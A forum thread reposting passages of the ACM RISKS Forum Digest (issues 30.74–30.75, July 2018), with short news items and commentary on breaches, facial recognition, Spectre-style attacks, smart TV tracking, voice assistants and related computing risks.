    Subject: Ticketmaster: How not to manage customers after a data breach.

    Like many in the UK I was contacted by Ticketmaster to let me know that my
    data might have been accessed through malicious software on the servers of a
    third party service provider. They have very kindly offered me a years free
    identity monitoring by Experian.

    The issue? The email tells me to sign up by...

    "Visit the Data Patrol website to get started:
    http://my.garlik.com/garlik-ui/expnuk/login
    http://click.customerservice.tmm.ticketmaster.co.uk ...

    Not a Ticketmaster site, not an Experian site, just a site that screams
    ***SCAM***!!!

    A minute or two googling tells me that this is probably the legitimate
    service provider but this really isn't how to give customers confidence that
    you take security seriously!

    ------------------------------

    Date: Mon, 2 Jul 2018 15:24:10 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: Re: Police, Law Enforcement, and corporate use of facial
    recognition and facial images in court (RISKS-30.73)

    This has been used in British Columbia for a decade, has proved quite
    effective, and is pretty much settled case law in both Criminal and Civil
    cases.

    In BC Driver Licencing and BC Service Card issuing for the BC Medical
    Services Plan have been offloaded out of core government to a Crown
    Corporation, the Insurance Corporation of BC. Photo ID Service Cards for MSP
    are a relatively new development. The Original BC ``Care Cards'' did not have
    photos and involved little or no verification of the identity of who they
    were issued to. BC Residents have the option of combining the BC Service
    Card and BC Driver's Licence into one card, or having separate cards. Most
    Privacy Professionals I have discussed this with chose to to have separate
    cards. I have overnight dialysis in a clinic 3 times a week, so I just take
    my BC Service Card and a transit pass with me.

    The BC Liquor Control Board used to issue its own Photo ID cards, decades
    ago, but those were also offloaded onto ICBC as ``BC ID Cards'' for people who
    did not have a BC Driver's Licence, such as a former premier who surrendered
    his DL after being caught driving under the influence in Hawaii.

    There have been at least two widely reported instances where Facial
    Recognition has been used to trigger investigations, or to identify
    criminals from photos.

    After the 2011 Stanley Cup Riot in Vancouver ICBC offered to scan its Facial
    Image DB, using the same recognition software that ICBC began using in 2008,
    without notice to customers, to detect attempts at Driver's Licence
    Fraud. ICBC had a vested interest in identifying the Rioters who damaged or
    destroyed automobiles insured by ICBC and later sued at least 46 people in
    Civil Actions. Facial Images flagged as possible Fraud attempts are reviewed
    by Police, not by ICBC employees. Bio-metric factors as height, weight, and
    eye colour are also used in the matching, not just Facial Recognition.

    http://www.burnabynow.com/news/six-burnaby-defendants-in-icbc-stanley-cup-riot-civil-suit-1.1896960

    BC Information and Privacy Commissioner Elizabeth Denham ruled that ICBC
    could only do that with due process. Police turned to the Internet and
    crowd sourced identification of the rioters from pictures posted on the
    web. That turned out to be very effective, resulting in tips about the names
    of hundreds of rioters. Human eyes still beat facial recognition?

    http://www.macleans.ca/news/last-two-stanley-cup-rioters-sentenced-to-time-behind-bars-for-assault/

    ``Prosecutors laid 912 charges against 300 suspects, and 284 people pleaded
    guilty. Another six had the charges against them stayed, while 10 went to
    trial, resulting in nine convictions and one acquittal.''

    Elizabeth Denham is now the UK Data Commissioner responsible for
    investigating the Cambridge Analytica scandal.

    http://www.cbc.ca/news/canada/briti...facial-recognition-to-track-rioters-1.1207398

    http://www.oipc.bc.ca/investigation-reports/1245

    Executive Summary [8] ``I conclude that ICBC must immediately cease
    responding to requests from police to use the facial recognition database
    for the purposes of identifying individuals for police absent a subpoena,
    warrant or court order.''

    ICBC's undisclosed use of Facial Recognition to detect attempts at DL Fraud
    became public knowledge when RCMP arrived at a Government Office in Victoria
    to arrest a Civil Servant who had a meteoric rise under the name Richard
    Perran. That turned out to be a family affair, with his wife also working in
    the BC Public Service Under a stolen identity. He had also obtained a Public
    Service subsidized Master's Degree from the University of Victoria, and
    tried to leverage that into at PhD under the stolen name after being
    convicted, despite being ordered to stop using the stolen name as a
    condition of sentencing and probation.

    http://www.timescolonist.com/icbc-f...altering-record-to-get-government-job-1.21668
    http://bctrialofbasi-virk.blogspot.com/2009/12/police-probe-hiring-of-bc-civil-servant.html
    http://www.pressreader.com/canada/times-colonist/20120617/281479273491097

    ------------------------------

    Date: Mon, 2 Jul 2018 16:00:39 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: Re: Florida skips gun background checks for a year after employee
    forgets login (RISKS-30.72,73)

    Did Security Administrators at the National Instant Criminal Background
    Check System (NICS) detect the fact that IDs were not being used and ask why
    the users were not using assigned IDs? If so did they pursue that with
    management in the Florida Department of Agriculture and Consumer Service?
    The report cited in RISKS says that the Florida OIG detected the issue.

    I was a top-level RACF Security Admin for the BC Ministry of Health from
    1980 until 2016, first in the BC Public Service and later as a Contracted
    Resource working for a world scale IT Services company with its HQ in
    Montreal.

    One of the auto generated routine reports that I had to review was a report
    of IDs that had expired passwords because the User had not changed the
    password for more than 60 days.

    Last-Use Date was also tracked.

    Part of my job was repeatedly nagging user supervisors about whether the
    person the ID was issued to was still working in a position that required
    access, based on the expired password and the last use date.

    Repeating the query at regular intervals was part of my job even though it
    tended to make me seem like a broken record.

    Responding to requests for new user IDs was something I used to revisit the
    matter. That is, why did the area need a new user ID when it had been issued
    positional IDs that had not been used in years, or even decades.

    Positional IDs are associated with a specific job function.

    If a user leaves, or changes job roles they get a new ID associated with the
    new role. The old ID should be reassigned deactivated, or deleted as part of
    that transition.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.74
    ************************
     
  10. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    4,755
    483
    283
    Apr 3, 2007
    Tampa
    Risks Digest 30.75

    RISKS List Owner

    Jul 14, 2018 5:48 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Saturday 14 July 2018 Volume 30 : Issue 75

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> and
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    The return of Spectre (ZDNet)
    Grand Pwning Unit: Accelerating microarchitectural attacks with the GPU
    (Colyer)
    Now-fixed iOS 11.3 bug reveals how Apple censors the Taiwanese
    flag on Chinese iPhones (9to5Mac)
    FAA pushes back on Boeing exemption for 787 safety flaw (FlightGlobal)
    Regulation of facial-recognition software? (WashPo)
    FACEPTION (Facial Personality Analytics)
    How Smart TVs in Millions of Homes Track More Than What's Onoo Tonight
    (NYTimes)
    Meet Scrub 50, the robot cleaner (StraitsTimes)
    Video: Gavin Williamson hilariously interrupted by Siri during
    statement to Parliament (9to5Mac)
    How Voice-Activated Assistants Pose Security Threats in Home, Office
    (EWeek)
    A Revised View of the IoT Ecosystem (Vinton Cerf, Computing Edge)
    Plan to use AI to help emergency call operators (The Straits Times)
    Hamas uses fake Facebook friends to dupe 100 soldiers into
    downloading spyware (The Times of Israel)
    Chinese hackers infiltrate systems at Australian National University
    (John Colville)
    Data encryption: How to avoid common workarounds (HPE)
    CRTC levies fines against two companies under Canada's anti-spam law
    (Kelly Bert Manning)
    Cameras to be deployed to detect illegal smoking (The Straits Times)
    PayPal Apologizes for Letter Demanding Payment From Woman Who Died
    of Cancer (NYTimes)
    ExxonMobil Bungles Rewards Card Debut (Krebs on Security)
    This keyboard attack steals passwords by reading heat from your
    fingers (Charlie Osborne)
    iOS 11.4 seems to have a battery drain problem (ZDNet)
    Watch that keyboard! (Web Informant)
    How the Pentagon Keeps Its App Store Secure (WiReD)
    Inside China Dystopian Dreams (NYTimes)
    Egypt Sentences Lebanese Tourist to 8 Years in Prison for Facebook
    Video (NYTimes)
    The Complexity of Simply Searching For Medical Advice (WiReD)
    According to Apple's digital assistant Siri, Marvel comic book legend
    Stan Lee had apparently died on Monday (Business Insider Singapore)
    Risk and cost/benefit ... *Rob Slade)
    Employees as subjects in clinical trials (Bob Fenichel)
    Re: Google is training machines to predict when a patient will die
    (John R. Levine, Richard M Stein, John R. Levine)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Thu, 12 Jul 2018 00:13:36 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The return of Spectre (ZDNet)

    Two new ways to assault computers using Spectre-style attacks have been
    discovered. These can be used against any operating system running on AMD,
    ARM, and Intel processors.

    The return of Spectre | ZDNet

    ------------------------------

    Date: Wed, 4 Jul 2018 18:23:00 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Grand Pwning Unit: Accelerating microarchitectural attacks with
    the GPU (Colyer)

    Grand Pwning Unit: Accelerating microarchitectural attacks with the GPU

    ------------------------------

    Date: Thu, 12 Jul 2018 00:00:23 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Now-fixed iOS 11.3 bug reveals how Apple censors the Taiwanese
    flag on Chinese iPhones (9to5Mac)

    A bug in iOS 11.3 --- fixed in iOS 11.4.1 --- revealed that Apple
    censors the Taiwanese flag on iPhones whose region is set to China

    The bug came to light when security researcher Patrick Wardle received a
    message from a Taiwanese friend, reporting that iMessage, WhatsApp and
    Facebook Messenger all crashed when she typed the word `Taiwan' or received
    a message containing the emoji for the Taiwanese flag.

    He was initially skeptical, but was able to verify the claim and --- by a
    somewhat tortuous process --- work out what was causing it.

    On an iOS device with CN (China) set as the language/locale, iOS is looking
    for the Taiwanese flag emoji and then removing it. That code was buggy,
    which was what caused the crash.

    Now-fixed iOS 11.3 bug reveals how Apple censors the Taiwanese flag on Chinese iPhones

    ------------------------------

    Date: Fri, 6 Jul 2018 20:44:05 +0100
    From: <ric...@hesketh.org.uk>
    Subject: FAA pushes back on Boeing exemption for 787 safety flaw
    (FlightGlobal)

    FAA pushes back on Boeing exemption for 787 safety flaw

    Exec summary: In order to meet a delivery schedule, Boeing would like the
    FAA to trust that some software which may contain bugs will provide a safety
    net in the event that other software containing a known defect causes an
    engine shutdown.

    ------------------------------

    Date: Sat, 14 Jul 2018 08:46:31 -0700
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Regulation of facial-recognition software? (WashPo)

    Microsoft is calling for government regulation on facial-recognition
    software, one of its key technologies, saying such artificial
    intelligence is too important and potentially dangerous for tech
    giants to police themselves.

    Microsoft calls for regulation of facial recognition, saying it’s too risky to leave to tech industry alone

    ------------------------------

    Date: Sun, 8 Jul 2018 13:45:07 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: FACEPTION (Facial Personality Analytics)

    FACEPTION IS A FACIAL PERSONALITY ANALYTICS TECHNOLOGY COMPANY

    We reveal personality from facial images at scale to revolutionize how
    companies, organizations and even robots understand people and dramatically
    improve public safety, communications, decision-making, and experiences.

    http://www.faception.com/

    ------------------------------

    Date: Fri, 06 Jul 2018 13:15:22 -0400
    From: José María Mateos <ch...@rinzewind.org>
    Subject: How Smart TVs in Millions of Homes Track More Than What's On
    Tonight (NYTimes)

    http://mobile.nytimes.com/2018/07/05/business/media/tv-viewer-tracking.html

    The growing concern over online data and user privacy has been focused on
    tech giants like Facebook and devices like smartphones. But people's data is
    also increasingly being vacuumed right out of their living rooms via their
    televisions, sometimes without their knowledge. [...]

    Once enabled, Samba TV can track nearly everything that appears on the TV on
    a second-by-second basis, essentially reading pixels to identify network
    shows and ads, as well as programs on Netflix and HBO and even video games
    played on the TV. Samba TV has even offered advertisers the ability to base
    their targeting on whether people watch conservative or liberal media
    outlets and which party's presidential debate they watched.

    ------------------------------

    Date: Fri, 06 Jul 2018 08:33:48 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Meet Scrub 50, the robot cleaner (StraitsTimes)

    http://www.straitstimes.com/singapore/meet-scrub-50-the-robot-cleaner

    Visitors to Singapore, a city-state of ~5.6m citizens and expatriates, often
    note the gumblob-free sidewalks, garbage-free streets, and spotless trains.

    In truth, Singapore is cleaned daily by an army of mop and broom-wielding
    custodians estimated to top ~70K in 2016
    http://www.straitstimes.com/singapo...million-people-70000-cleanersthats-ridiculous).

    Many are senior citizens earning minimum wages to supplement their
    retirement. Demographically, custodians are diminishing, and few young
    people wish to pursue this career path.

    Enter Scrub 50, which aspires to replace these workers and fill the human
    deficit.

    ``For example, daily scrubbing of 5,000 sq m over a one-month period would
    require a cleaner to put in 300 hours of work, but the robot takes 130
    hours, its developers claim.''

    Advocates of universal income guarantees should take note of any trial
    deployment and outcome, including robo-mopping incidents.

    ------------------------------

    Date: Thu, 5 Jul 2018 19:37:19 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Video: Gavin Williamson hilariously interrupted by Siri during
    statement to Parliament (9to5Mac)

    We've all had it happen before, Siri going off when your iPhone thinks it
    heard the *Hey Siri* command when nothing remotely close was mentioned.

    Well, today this happened in a public environment and it was
    absolutely hilarious. As tweeted by BBC Parliament, Siri made a brief
    interruption while Gavin Williamson was making a statement.


    From what we can hear, it sounds like surrounding areas triggered the
    Hey Siri command on the phone, which prompted Siri to respond on the
    iPhone.

    False positives with voice assistants are always fun, especially when it
    falsely catches the trigger phrase, but gets every word after that
    verbatim. We can only hope for Apple to keep improving its machine learning
    so things like this won't happen in the future.

    Check out the full clip below.

    http://9to5mac.com/2018/07/03/siri-hijacks-bbc-parliament-statement/

    Only today, I commanded my iPad -- which ignored me, but my wife's nearby
    iPhone responded.

    ------------------------------

    Date: Fri, 6 Jul 2018 11:44:49 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: How Voice-Activated Assistants Pose Security Threats in Home, Office
    (EWeek)

    http://www.eweek.com/security/five-ways-digital-assistants-pose-security-threats-in-home-office

    What a surprise, hmmm?

    ------------------------------

    Date: Thu, 5 Jul 2018 09:16:46 -0400
    From: George Sherwood <sher...@transedge.com>
    Subject: A Revised View of the IoT Ecosystem (Vinton Cerf, Computing Edge)

    An IoT ensemble must actually be in a kind of continuous configuration
    mode, anticipating the arrival and departure of all manner of
    Internet-enabled devices. Among the implications is the notion that
    the local IoT management system needs to expect that new devices will
    need to be configured into the system and others to depart - it needs
    to sense their arrivals and departures and to react accordingly.

    Here's a scary thought: what if a device is adopted that's corrupted, and it
    has a backdoor allowing remote access to a residential network of devices?

    http://www.computer.org/csdl/mags/ic/2017/05/mic2017050072.pdf

    ------------------------------

    Date: Thu, 12 Jul 2018 12:18:35 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Plan to use AI to help emergency call operators (The Straits Times)

    http://www.straitstimes.com/singapore/plan-to-use-ai-to-help-emergency-call-operators

    ``With Singapore's emergency dispatch phone operators receiving almost
    200,000 calls for assistance a year, every minute is vital. In an effort
    to ease their workload, the Singapore Civil Defence Force (SCDF) and four
    other government agencies are turning to artificial intelligence (AI),
    using a speech recognition system developed to transcribe and log each
    call received in real time - even if it is in Singlish.''

    The Straits Times article states the platform possesses a 90% speech-to-text
    recognition accuracy rate based on a 80Kword Mandarin & English dictionary.
    The dictionary was constructed manually from YouTube, SoundCloud and
    Singapore radio programs where mixed language (Malay, Hokkien, Mandarin, and
    English) conversations are routine among Singaporeans.

    A high incidence of emergency operator post-traumatic stress disorder
    and critical incident stress syndrome is reported from the field (see h
    ttps://www.factretriever.com/911-emergency-call-facts, retrieved on
    12JUL2018).

    http://www.nena.org/page/911Statistics
    estimates ~240M emergency (911) calls per year in the US, with ~15-20%
    identified as non-emergencies. ~80% estimated from mobile devices. In
    Singapore, mobile devices dominate; this figure is probably much
    higher. Landline v. mobile emergency call statistics are not readily
    available in Singapore.

    Given a 15-20% non-emergency usage of 911 (999 in Singapore), ~30-40K
    calls/year of a non-emergency basis in Singapore might accidentally arise.

    The risk is that automatic speech-to-text transcription does not suppress
    false emergency dispatch incident density based on the logged
    content. Unclear from the article if there's a human involved to inspect the
    transcription and arbitrate dispatch.

    [1] Jesse Jarnow, Why Our Crazy-Smart AI Still Sucks at Transcribing
    Speech, claims ~12% speech-to-text error rate
    http://www.wired.com/2016/04/long-form-voice-transcription/

    [2] Laim Tung, Microsoft's newest milestone? World's lowest error rate
    in speech recognition
    http://www.zdnet.com/article/micros...rlds-lowest-error-rate-in-speech-recognition/

    ------------------------------

    Date: Thu, 5 Jul 2018 15:11:49 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Hamas uses fake Facebook friends to dupe 100 soldiers into
    downloading spyware (The Times of Israel)

    Military intelligence officers say no damage to security after soldiers fall
    for terror group cyberplot, sign up for fake World Cup and dating apps

    http://www.timesofisrael.com/idf-wa...-spy-on-them-with-fake-dating-world-cup-apps/

    ------------------------------

    Date: Sat, 7 Jul 2018 07:25:17 +0000
    From: John Colville <John.C...@uts.edu.au>
    Subject: Chinese hackers infiltrate systems at Australian National University

    Australian National University is one of Australia's top research
    universities

    http://www.abc.net.au/news/2018-07-...te-anu-it-systems/9951210?WT.ac=statenews_act

    Hackers based in China have infiltrated one of Australia's most prestigious
    universities, and the threat is yet to be shut down. The ABC has been told
    the Australian National University (ANU) system was first compromised last
    year. In a statement, the ANU said it had been working with intelligence
    agencies for several months to minimise the impact of the threat.

    ------------------------------

    Date: Mon, 9 Jul 2018 23:34:52 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Data encryption: How to avoid common workarounds (HPE)

    Sloppy practice by data security personnel can, and often does, allow clever
    hackers to gain access to the data without actually defeating the encryption
    algorithms. Learn what measures to take to prevent such security breaches.
    http://www.hpe.com/us/en/insights/articles/data-encryption-how-to-avoid-common-workarounds-1807.html

    ------------------------------

    Date: Thu, 12 Jul 2018 11:25:53 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: CRTC levies fines against two companies under Canada's anti-spam
    law

    The companies involved did not send spam themselves, they provided ISP
    services for malware spreaders and ``accepted unverified and anonymous
    customers''.

    ``Our enforcement actions send a clear message to companies whose business
    models may enable these types of activities,'' said Steven Harroun, the
    CRTC's chief compliance and enforcement officer. Through their actions
    and omissions, Datablocks and Sunlight Media aided in the commission of
    acts contrary to section 8 of the Act.

    http://crtc.gc.ca/eng/archive/2018/vt180711.htmh
    http://www.timescolonist.com/crtc-l...anies-under-canada-s-anti-spam-law-1.23365348

    ------------------------------

    Date: Tue, 10 Jul 2018 10:04:29 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Cameras to be deployed to detect illegal smoking
    (The Straits Times)

    http://www.straitstimes.com/singapore/cameras-to-be-deployed-to-detect-illegal-smoking

    ``As smoking curbs are extended, the number of offenders has increased. The
    NEA [National Environment Agency] issued about 22,000 tickets last year to
    people smoking at prohibited areas, compared with 19,000 in 2016.''

    High-resolution IR cameras positioned to detect smokers in prohibited areas
    supplemented with visual facial recognition matching to ID
    offenders. Another example of surveillance sensor fusion to find and fine
    scofflaws.

    Singapore's governance model, an example of *benign* authoritarianism,
    emphasizes civil order. Suppressing second-hand smoke exposure is a hot
    enforcement priority for public health initiatives.

    The CDC estimates that ~41K US citizens die annually from secondhand smoke-
    related diseases (principally heart and lung diseases). Assuming US
    population of 340m, and Singapore's is ~5.6m, the arithmetic gives:
    5.6m/340m * 41Kcitizens ~= 675 annual deaths per year in Singapore
    attributed to secondhand smoke-related diseases.
    <https://www.cdc.gov/tobacco/data_statistics/fact_sheets/secondhand_smoke/general_facts/index.htm>

    ------------------------------

    Date: Thu, 12 Jul 2018 09:44:08 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: PayPal Apologizes for Letter Demanding Payment From Woman Who Died
    of Cancer (NYTimes)

    http://www.nytimes.com/2018/07/11/business/paypal-dead-wife-husband-letter-nyt.html

    ``We have received notice that you are deceased,'' said the
    letter, which threatened legal action over outstanding debt and left the
    British woman's husband `incredulous'.

    ------------------------------

    Date: Mon, 9 Jul 2018 17:00:03 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: ExxonMobil Bungles Rewards Card Debut (Krebs on Security)

    Energy giant ExxonMobil recently sent snail mail letters to its Plenti
    rewards card members stating that the points program was being replaced with
    a new one called Exxon Mobil Rewards+. Unfortunately, the letter includes a
    confusing toll-free number and directs customers to a parked page that tries
    to foist Web browser extensions on visitors.

    The mailer (the first page of which is screenshotted below) urges customers
    to visit exxonmobilrewardsplus[dot]com, to download its mobile app, and to
    call 1-888-REWARD with any questions. It may not be immediately obvious, but
    that + sign is actually the same thing as a zero on the telephone keypad
    (although I'm ashamed to say I had to look that up online to be sure).

    http://krebsonsecurity.com/2018/07/exxonmobil-bungles-rewards-card-debut/

    ------------------------------

    Date: Thu, 05 Jul 2018 18:30:17 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: This keyboard attack steals passwords by reading heat from your
    fingers (Charlie Osborne)

    Charlie Osborne for Zero Day, 5 Jul 2018
    Thermanator harvests thermal energy to steal passwords directly from your
    fingertips. A new attack has been presented by researchers which is able to
    record thermal residue from keyboards in order to steal credentials.

    http://www.zdnet.com/article/this-attack-steals-your-passwords-by-reading-keyboard-heat/

    ------------------------------

    Date: Mon, 9 Jul 2018 16:45:04 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: iOS 11.4 seems to have a battery drain problem (ZDNet)

    http://www.zdnet.com/article/ios-11-4-seems-to-have-a-battery-drain-problem/

    Every iOS upgrade? I've deferred this one, in spite of advice given to
    always upgrade quickly for security patches.

    ------------------------------

    Date: Mon, 9 Jul 2018 16:42:50 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Watch that keyboard! (Web Informant)

    Here is the thing. In order to install one of these keyboard apps, you have
    to grant it access to your phone. This seems like common sense, but sadly,
    this also grants the app access to pretty much everything you type, every
    piece of data on your phone, and every contact of yours too. Apple calls
    this full access, and they require these keyboards to ask explicitly for
    this permission after they are installed and before you use them for the
    first time. Many of us don't read the fine print and just click yes and go
    about our merry way.

    http://blog.strom.com/wp/?p=6603

    ------------------------------

    Date: Sun, 8 Jul 2018 23:37:27 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: How the Pentagon Keeps Its App Store Secure (WiReD)

    ``NGA is kind of a unique combat-support agency,'' Saffel says. ``With the
    GEOINT App Store we chose to go into a very risky new frontier for DOD and
    the government in general, but I think we've demonstrated that we can do
    things differently and still be secure and still control access. We're
    supporting a lot of different mission sets, and I expect that the app store
    will keep growing.''

    http://www.wired.com/story/dod-app-store-does-this-one-crucial-thing-to-stay-secure

    ------------------------------

    Date: Sun, 8 Jul 2018 18:54:40 -0400
    From: José María Mateos <ch...@rinzewind.org>
    Subject: Inside China Dystopian Dreams (NYTimes)

    http://www.nytimes.com/2018/07/08/business/china-surveillance-technology.html

    In the Chinese city of Zhengzhou, a police officer wearing facial
    recognition glasses spotted a heroin smuggler at a train station.

    In Qingdao, a city famous for its German colonial heritage, cameras powered
    by artificial intelligence helped the police snatch two dozen criminal
    suspects in the midst of a big annual beer festival.

    In Wuhu, a fugitive murder suspect was identified by a camera as he bought
    food from a street vendor.

    With millions of cameras and billions of lines of code, China is building a
    high-tech authoritarian future. Beijing is embracing technologies like
    facial recognition and artificial intelligence to identify and track 1.4
    billion people. It wants to assemble a vast and unprecedented national
    surveillance system, with crucial help from its thriving technology
    industry.

    http://rinzewind.org/blog-es

    [Also noted by Richard M Stein. PGN]

    ------------------------------

    Date: Sun, 8 Jul 2018 08:53:51 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Egypt Sentences Lebanese Tourist to 8 Years in Prison for Facebook
    Video (NYTimes)
    via NNSquad
    http://www.nytimes.com/2018/07/07/w...ces-lebanese-tourist.html?partner=rss&emc=rss

    An Egyptian court sentenced a Lebanese tourist to eight years in prison on
    Saturday after she posted a video tirade on her Facebook page that
    Egyptian authorities claimed had insulted the country and its leader. The
    news website Ahram reported that Mona el-Mazbouh was initially handed an
    11-year sentence and a fine after she was convicted of ``deliberately
    broadcasting false rumors which aim to undermine society and attack
    religions.

    ------------------------------

    Date: Sun, 8 Jul 2018 23:34:51 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: The Complexity of Simply Searching For Medical Advice (WiReD)

    As we increasingly rely on search and on social to answer questions that
    have a profound impact on both individuals and society, especially where
    health is concerned, this difficulty in discerning, and surfacing, sound
    science from pseudo-science has alarming consequences. Will we have to fight
    the battle of keyword voids at a grassroots level, wrangling with the
    asymmetry of passion by tapping people to find these voids and create
    counter-content? Do we need to organize counter-GoFundMe campaigns to pay
    for ad campaigns that promote real science? Or will the tech platforms where
    this is occurring begin to understand that giving legitimacy to health
    misinformation via high search and social rankings is profoundly harmful?
    Getting high-quality, fact-based health information shouldn't be dependent
    on the outcome of SEO games, or on who has more resources for pay-to-play
    content promotion.

    Ultimately, the question is, how do we incorporate factual accuracy into
    rankings when no one is willing to be the *arbiter of truth*.
    Unfortunately, the answer is not easily Googled.

    http://www.wired.com/story/the-complexity-of-simply-searching-for-medical-advice

    The risk? Energetic advocates of nonsense.

    ------------------------------

    Date: Fri, 6 Jul 2018 18:11:27 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: According to Apple's digital assistant Siri, Marvel comic book
    legend Stan Lee had apparently died on Monday (Business Insider Singapore)

    Comic book fans were in for a shock this week when they were told that
    Marvel comic book legend Stan Lee, had passed away on Monday (July 2).

    The `news' was broken by Apple's digital assistant Siri, as reported first
    by CinemaBlend.
    http://www.cinemablend.com/news/2444550/siri-is-telling-people-stan-lee-died-yesterday

    While Stan Lee is still alive and well at the sprightly age of 95, it did
    not stop Siri from telling users that he had *died* on July 2, 2018, when
    asked how old he was.

    Siri has since corrected the information, but it still raises questions as
    to how the software got it wrong.

    The problem can be traced back to Lee's Wikipedia page
    http://en.wikipedia.org/wiki/Stan_Lee
    http://io9.gizmodo.com/siri-erroneously-told-people-stan-lee-was-dead-1827322243

    In the recent profile history of Lee, user `&beer&love' changed Lee's Wiki
    data to include a `date of death', pronouncing him dead.

    http://www.businessinsider.sg/siri-stan-lee-died-on-monday/

    Siri relying for information on Wikipedia which can be changed by anyone,
    even &beer&love. Sure beats those dusty encyclopedia volumes I grew up with.

    ------------------------------

    Date: Thu, 5 Jul 2018 11:16:18 -0800
    From: Rob Slade <rms...@shaw.ca>
    Subject: Risk and cost/benefit ...

    I live in Vancouver, British Columbia, Canada. We have an abundance of
    natural beauty. Therefore, we also have an abundance of tourists.

    I was born here. (So were my parents. And 75% of my grandparents.) Those
    of us who are long time residents know that the natural beauty comes with
    some natural dangers.

    A lot of the tourists don't seem to realize that. In our social media
    intense and almost virtual world, people don't seem to realize that you
    can't just press *undo* or *reload* when you do something stupid in the real
    world.
    http://vancouversun.com/news/local-news/rugged-b-c-locales-are-a-magnet-for-selfie-seekers
    or http://is.gd/C1rOty

    And we also seem to have a society that idolizes risk-taking. You've got to
    live `on the edge'. You've got to get closer to the edge than anyone else.

    Well, sometimes when you get to close to the edge, you fall off.
    http://vancouversun.com/news/local-...for-trio-missing-near-squamishs-shannon-falls or
    http://is.gd/qolaca

    We've got a big tourist industry in BC. (No, it's not just a business here,
    it's an industry.) We've got lots of companies that spend time and money
    taking people out into the wild. In a (reasonably) safe way. But, for
    some, that isn't enough. They've got to go beyond the bounds. And then
    they get into trouble.

    I live near Lynn Canyon. I live between the fire station and Lynn Canyon.
    We hear the sirens all the time, indicating that some tourist has decided
    that he's (it's usually he, or her, when some idiot convinces his girlfriend
    to accompany him) smarter then the locals who posted all the ``don't jump off
    dangerous areas'' signs. We heard them again last night. It was late last
    night, so I assume that whoever killed himself last night hasn't made the
    news sites yet.
    http://vancouversun.com/news/local-...ehaviour-in-lynn-canyon-north-shore-mountains or
    http://is.gd/ghM3w2

    For the reasons stated above, we have some of the best search and rescue
    volunteers in the world in our neck of the woods. They are, unfortunately,
    extremely experienced. We have, also unfortunately, a bunch of helicopter
    pilots who have lots of experience in trying to put a helicopter into deep
    canyons, or very close to waterfalls, or rock faces. It's dangerous work.
    Forced upon us by tourists who want the ultimate selfie ...

    ------------------------------

    Date: Thu, 5 Jul 2018 16:18:16 -0700
    From: "Robert R. Fenichel" <b...@fenichel.net>
    Subject: Employees as subjects in clinical trials (Re: Stein, RISKS-30.74)

    Richard M. Stein suggests that when AI-based diagnostic programs are
    tested in randomized clinical trials (RCTs), the affected patients
    should be the vendor's employees and their families. This is
    problematic.

